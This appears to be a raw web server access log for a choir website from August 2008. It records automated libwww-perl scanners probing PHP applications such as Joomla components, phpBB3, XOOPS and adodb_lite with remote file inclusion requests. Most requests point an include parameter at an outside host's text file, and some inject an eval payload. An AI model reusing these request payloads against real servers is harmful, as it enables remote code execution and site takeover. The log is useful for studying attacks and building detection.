74.6.22.167 - - [20/Aug/2008:05:31:59 -0700] "GET /logs/access_080820.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.americanboyschoir.com"
64.22.89.194 - - [20/Aug/2008:05:32:19 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:32:19 -0700] "GET /logs/access_080805.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:32:19 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:32:20 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:32:33 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:32:33 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:32:33 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:32:49 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:32:49 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:33:05 -0700] "GET /logs/access_080729.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
89.208.43.121 - - [20/Aug/2008:05:33:08 -0700] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.seaofgreenclan.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
89.208.43.121 - - [20/Aug/2008:05:33:09 -0700] "GET /logs/access_080807.log//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.seaofgreenclan.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
89.208.43.121 - - [20/Aug/2008:05:33:09 -0700] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.seaofgreenclan.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
89.208.43.121 - - [20/Aug/2008:05:33:10 -0700] "GET /logs/access.log//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.seaofgreenclan.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "americanboyschoir.com"
89.208.43.121 - - [20/Aug/2008:05:33:10 -0700] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.seaofgreenclan.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "americanboyschoir.com"
89.208.43.121 - - [20/Aug/2008:05:33:11 -0700] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.seaofgreenclan.com/idd.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:33:12 -0700] "GET /logs/access_080729.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:33:19 -0700] "GET /logs/access.log///?custompluginfile%5B%5D=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:33:19 -0700] "GET ///?custompluginfile%5B%5D=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 200 1725 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:33:19 -0700] "GET /logs///?custompluginfile%5B%5D=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 200 1659 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:33:29 -0700] "GET /logs/access.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:33:29 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:33:30 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:33:30 -0700] "GET /logs/access_080810.log//modules/My_eGallery/index.php?basepath=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:33:33 -0700] "GET /logs/access_080729.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:33:36 -0700] "GET /logs/access_080810.log///?custompluginfile%5B%5D=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:33:40 -0700] "GET /logs/access_080729.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:33:42 -0700] "GET /logs/access_080729.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:33:42 -0700] "GET /logs/access_080729.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:33:47 -0700] "GET /logs/access_080805.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:33:48 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:33:48 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:33:57 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:33:57 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:34:01 -0700] "GET /logs/access.log//poll/png.php?include_path=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:34:01 -0700] "GET /logs//poll/png.php?include_path=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:34:01 -0700] "GET //poll/png.php?include_path=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:34:11 -0700] "GET /logs/access_080810.log//poll/png.php?include_path=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:34:14 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:34:15 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "americanboyschoir.com"
139.146.145.67 - - [20/Aug/2008:05:34:21 -0700] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
139.146.145.67 - - [20/Aug/2008:05:34:21 -0700] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://verinet.com.tr/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
62.119.28.109 - - [20/Aug/2008:05:34:45 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:34:46 -0700] "GET /logs/access_080811.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:34:46 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:34:47 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:35:07 -0700] "GET /logs/access_080810.log///?custompluginfile%5B%5D=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:35:16 -0700] "GET /logs/access.log//poll/png.php?include_path=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:35:16 -0700] "GET //poll/png.php?include_path=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:35:16 -0700] "GET /logs//poll/png.php?include_path=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:35:27 -0700] "GET /logs/access_080812.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:35:34 -0700] "GET /logs/access_080811.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:35:35 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:35:35 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:35:41 -0700] "GET /logs/access_080729.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
118.129.166.13 - - [20/Aug/2008:05:35:43 -0700] "GET /logs/access_080729.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:36:40 -0700] "GET /logs/access.log/index.php?url=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:36:40 -0700] "GET /logs/index.php?url=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:36:40 -0700] "GET /index.php?url=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
67.41.4.26 - - [20/Aug/2008:05:36:40 -0700] "GET /logs//include/lib.inc.php?site_path=http://www.keys.idv.tw/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
67.41.4.26 - - [20/Aug/2008:05:36:40 -0700] "GET //include/lib.inc.php?site_path=http://www.keys.idv.tw/uploads/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
219.117.239.114 - - [20/Aug/2008:05:36:45 -0700] "GET /logs/access_080729.log//include/lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:36:51 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://injek.by.ru/download/source/klr-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:36:55 -0700] "GET /logs/access_080810.log/index.php?url=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:37:00 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://injek.by.ru/download/source/klr-id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
85.159.91.143 - - [20/Aug/2008:05:37:13 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.zaisk.lt/images/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
195.149.115.2 - - [20/Aug/2008:05:37:24 -0700] "GET /logs/access_080812.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:37:39 -0700] "GET /logs/access_080730.log///?custompluginfile%5B%5D=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:37:54 -0700] "GET /logs/access_080811.log///?custompluginfile%5B%5D=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:37:55 -0700] "GET /logs/access.log/index.php?url=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:37:58 -0700] "GET /logs/access_080730.log//poll/png.php?include_path=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:38:16 -0700] "GET /logs/access_080811.log//poll/png.php?include_path=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:38:32 -0700] "GET /logs/access_080810.log/index.php?url=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
70.85.201.66 - - [20/Aug/2008:05:38:36 -0700] "GET /logs/access_080729.log//include/lib.inc.php?site_path=http://ravennet.co.uk/components/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:38:36 -0700] "GET //?path%5Bdocroot%5D=http://www.helpvenice.com/response.txt?? HTTP/1.1" 200 1724 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:38:36 -0700] "GET /logs/access_080814.log//?path%5Bdocroot%5D=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:38:36 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.helpvenice.com/response.txt?? HTTP/1.1" 200 1658 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
213.248.60.128 - - [20/Aug/2008:05:38:38 -0700] "GET /logs/access_080805.log//?path%5Bdocroot%5D=http://www.helpvenice.com/response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:38:46 -0700] "GET /logs/access_080810.log/index.php?category_id=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:38:46 -0700] "GET /index.php?category_id=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:38:46 -0700] "GET /logs/index.php?category_id=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:38:47 -0700] "GET /logs/access_080810.log/index.php?category_id=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:38:47 -0700] "GET /logs/access.log/index.php?category_id=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:38:47 -0700] "GET /logs/index.php?category_id=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:38:47 -0700] "GET /index.php?category_id=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
64.59.78.78 - - [20/Aug/2008:05:38:48 -0700] "GET /logs/access.log/index.php?category_id=http://www.seniorfitnessuk.com/ray/modules/global/inc/htacess.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
87.230.22.202 - - [20/Aug/2008:05:41:04 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://acc-advertising.com/img/idnya.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
213.92.85.234 - - [20/Aug/2008:05:42:25 -0700] "GET /logs/access_080808.log/?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
213.92.85.234 - - [20/Aug/2008:05:42:25 -0700] "GET /logs/access.log/?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
213.92.85.234 - - [20/Aug/2008:05:42:25 -0700] "GET /?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 200 1724 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
213.92.85.234 - - [20/Aug/2008:05:42:25 -0700] "GET /logs/?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 200 1653 "-" "libwww-perl/5.811" "www.americanboyschoir.com"
74.52.99.98 - - [20/Aug/2008:05:42:40 -0700] "GET /logs/access_080808.log/?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
74.52.99.98 - - [20/Aug/2008:05:42:40 -0700] "GET /logs/?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 200 1653 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
74.52.99.98 - - [20/Aug/2008:05:42:41 -0700] "GET /?sourcedir=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 200 1724 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:42:41 -0700] "GET /logs//index.php?config=1&base_datapath=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:42:41 -0700] "GET //index.php?config=1&base_datapath=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:42:41 -0700] "GET /logs/access.log//index.php?config=1&base_datapath=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
78.129.153.15 - - [20/Aug/2008:05:43:00 -0700] "GET /logs/access_080810.log//index.php?config=1&base_datapath=http://relemerge.org/images/gabungan.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:43:43 -0700] "GET /logs/access_080810.log//index.php?config=1&base_datapath=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:43:43 -0700] "GET //index.php?config=1&base_datapath=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
69.73.155.242 - - [20/Aug/2008:05:43:43 -0700] "GET /logs//index.php?config=1&base_datapath=http://web4cc.t35.com/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:44:20 -0700] "GET /logs/access_080730.log//poll/png.php?include_path=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:44:20 -0700] "GET //poll/png.php?include_path=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:44:20 -0700] "GET /logs//poll/png.php?include_path=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
121.180.11.132 - - [20/Aug/2008:05:44:30 -0700] "GET /logs/access_080808.log//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.benjaminclayton.co.uk//help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
121.180.11.132 - - [20/Aug/2008:05:44:30 -0700] "GET //squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.benjaminclayton.co.uk//help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
195.39.5.203 - - [20/Aug/2008:05:44:40 -0700] "GET /logs/access_080811.log//poll/png.php?include_path=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
121.180.11.132 - - [20/Aug/2008:05:44:41 -0700] "GET /logs//squirrelcart/cart.php/popup_window.php?site_isp_root=http://www.benjaminclayton.co.uk//help01.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.americanboyschoir.com"
